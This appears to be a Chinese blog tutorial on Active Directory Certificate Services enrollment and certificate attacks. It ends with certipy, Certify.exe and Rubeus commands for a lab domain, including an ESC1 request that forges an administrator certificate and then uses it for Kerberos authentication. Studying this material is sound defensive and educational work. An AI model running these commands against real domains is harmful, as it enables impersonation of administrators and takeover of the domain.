当前位置: 首页 > news >正文

申请证书和证书攻击

使用模板申请证书流程图如下:

  1. 客户端生成密钥对。

  2. 客户端生成证书签名请求(CSR,Certificate Signing Request),CSR 有密钥对的私钥签名,主要包含证书模板和密钥对的公钥。

  3. 服务端检查模板是否允许,用户是否具有申请证书的权限。

  4. 服务端生成证书,并用 CA 私钥进行数字签名。

  5. 生成后,服务端发放证书给客户端。

  • 第 4 步中的 CA 私钥是颁发者信任证书的密钥对中的私钥。

  • 颁发者信任证书会成为所申请证书的证书链中的上一级证书。

注册证书方式

客户端可以根据 ADCS 环境的配置选择不同⽅式注册证书:

  • Windows 客户端证书注册协议(MS-WCCE),这是一组分布式组件对象模型(DCOM)接口,可与 ADCS 进行交互。DCOM 服务默认在所有 ADCS 服务器上启用。

  • ICertPassage 远程协议(MS-ICPR):在命名管道或 TCP/IP 上运行的 RPC 协议。

  • 证书注册 Web 界面,ADCS 服务器需要安装并配置 “证书颁发机构 Web 注册” 角色。访问http:///certsrv/。

用户模板:所有域用户都有利用此模板申请证书权限。

机器模板:Domain Computers 组中的机器用户都有利用此模板申请证书权限。

#用户请求证书
certipy req -u administrator@HACK.com -p p-0p-0p-0 -dc-ip 192.168.72.21 -target 192.168.72.21 -ca HACK-DC01-CA -template User -debug
​
#机器请求证书
certipy req -u WIN10-02\$ -p p-0p-0p-0 -dc-ip 192.168.72.21 -target 192.168.72.21 -ca HACK-DC01-CA -template Machine -debug
​
#在域内机器执行,以当前登录的用户权限申请证书
Certify.exe request /ca:DC01.HACK.com\HACK-DC01-CA /template:User
#在域内机器执行,以当前登录的用户权限伪造 administrator 用户申请证书
Certify.exe request /ca:DC01.HACK.com\HACK-DC01-CA /template:ESC1 /altname:HACK\administrator
​
certipy auth -pfx administrator.pfx -dc-ip 192.168.72.21 -debug

Rubeus
使用 Rubeus 执行如下命令用证书 administrator.pfx 进行 Kerberos 认证。
Rubeus.exe asktgt /user:administrator /password:p-0p-0p-0 /certificate:administrator.pfx /domain:HACK.com /dc:DC01.HACK.com

相关文章:

  • buuctf-[极客大挑战 2019]Knife题解
  • Part 3 第十二章 单元测试 Unit Testing
  • 论文笔记-WWWCompanion2024-LLM as Data Augmenters for Cold-Start Item Recommendation
  • NoSQL之redis数据库
  • Linux操作系统4-进程间通信4(共享内存原理,创建,查看,命令)
  • Test the complete case
  • 新一代MPP数据库:StarRocks
  • 智能网络感知,打造极致流畅的鸿蒙原生版中国移动云盘图文体验
  • 设计模式学习笔记
  • 2025年股指期货和股指期权合约交割的通知!
  • MQTT的连接配置以及重连机制和遇到的问题--------求如何修改更加好
  • Flask flash() 消息示例
  • Python大数据可视化:基于Python的王者荣耀战队的数据分析系统设计与实现_flask+hadoop+spider
  • 数据分析和数据挖掘的工作内容
  • ollama 学习笔记
  • 亚马逊企业购大客户业务拓展经理张越:跨境电商已然成为全球零售电商领域中熠熠生辉的强劲增长点
  • 本地安装 Grafana Loki
  • HTTP SSE 实现
  • RabbitMq 基础
  • 贪心算法
  • 做网站要不要花钱做店长/长春seo招聘
  • html怎么制作动态网站/今日新闻事件
  • 上海网站建设做物流一/官方网站怎么注册
  • 能不能用自己的主机做网站/seo优化关键词分类
  • 企业宣传网站怎么做/注册城乡规划师好考吗
  • 企业自己做网站/推广哪个平台好